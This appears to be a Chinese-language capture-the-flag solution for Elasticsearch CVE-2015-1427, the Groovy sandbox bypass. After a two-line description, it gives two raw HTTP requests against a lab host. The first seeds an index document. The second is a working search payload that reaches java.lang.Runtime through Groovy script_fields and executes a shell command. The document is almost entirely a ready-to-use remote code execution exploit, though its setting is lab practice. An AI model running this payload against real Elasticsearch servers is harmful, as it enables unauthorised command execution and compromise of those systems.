elasticsearchCVE-2015-1427
名称: elasticsearch 代码执行 (CVE-2015-1427)
描述:
CVE-2014-3120后,ElasticSearch默认的动态脚本语言换成了Groovy,并增加了沙盒,但默认仍然支持直接执行动态语言。1.是一个沙盒绕过; 2.是一个Goovy代码执行漏洞。
解题方法
由于查询时至少要求es中有一条数据,所以发送如下数据包,增加一个数据:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| POST /website/blog HTTP/1.1
Host: 123.58.236.76:49832
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
{
"name": "test"
}
|
发送获取flag的解题方法
1
2
3
4
5
6
7
8
9
10
11
12
13
| POST /_search?pretty HTTP/1.1
Host: 123.58.236.76:49832
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.8) Gecko/20100101 Firefox/60.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls /tmp\").getText()"}}}
|